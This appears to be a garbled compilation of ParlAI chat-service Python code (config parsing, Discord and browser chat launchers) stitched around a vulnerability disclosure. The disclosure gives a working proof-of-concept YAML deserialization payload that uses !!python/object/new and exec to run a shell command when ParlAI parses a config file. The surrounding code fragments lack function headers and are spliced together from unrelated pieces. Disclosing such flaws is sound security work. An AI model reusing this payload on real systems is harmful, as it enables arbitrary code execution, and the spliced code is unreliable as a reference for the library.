def setup_opt(self):
opt = Opt()
config_path = '/app/src/nlp/config.yml'
config = config_utils.parse_configuration_file(config_path)
# opt['model_file'] = config['world_opt']['model_file']
# opt['task'] = None
opt['parlai_home'] = self.parlai_home
opt['datapath'] = self.parlai_datapath
opt['download_path'] = self.parlai_download
opt['safety'] = 'all'
opt.update(config['world_opt'])
opt['config'] = config
return opt
############################################################################
Vulnerability details
############################################################################
Description
ParlAI was vulnerable to YAML deserialization attack caused by unsafe
loading which leads to Arbitrary Code Execution.
Proof of Concept
Create the following PoC file (exploit.py)
import os
#os.system('pip3 install parlai')
from parlai.chat_service.utils import config
exploit = """!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('xcalc')"
"""
open('config.yml','w+').write(exploit)
config.parse_configuration_file('config.yml')
Execute the python script ie, python3 exploit.py
Impact
Code Execution
############################################################################
"""
parser = ParlaiParser(False, False)
parser.add_parlai_data_path()
parser.add_chatservice_args()
parser_grp = parser.add_argument_group('Discord Chat')
parser_grp.add_argument(
'--port', default=35496, type=int, help='Port to run the discord chat server'
)
return parser.parse_args()
def run(opt):
"""
Run DiscordManager.
"""
opt['service'] = SERVICE_NAME
manager = DiscordManager(opt)
try:
manager.start_task()
finally:
manager.shutdown()
if __name__ == '__main__':
opt = setup_args()
config_path = opt.get('config_path')
config = config_utils.parse_configuration_file(config_path)
opt.update(config['world_opt'])
opt['config'] = config
run(opt)
parser = ParlaiParser(False, False)
parser.add_parlai_data_path()
parser.add_chatservice_args()
parser_grp = parser.add_argument_group('Browser Chat')
parser_grp.add_argument('--port',
default=35496,
type=int,
help='Port to run the browser chat server')
return parser.parse_args()
def run(opt):
"""
Run BrowserManager.
"""
opt['service'] = SERVICE_NAME
manager = BrowserManager(opt)
try:
manager.start_task()
finally:
manager.shutdown()
if __name__ == '__main__':
opt = setup_args()
config_path = opt.get('config_path')
config = parse_configuration_file(config_path)
opt.update(config['world_opt'])
opt['config'] = config
run(opt)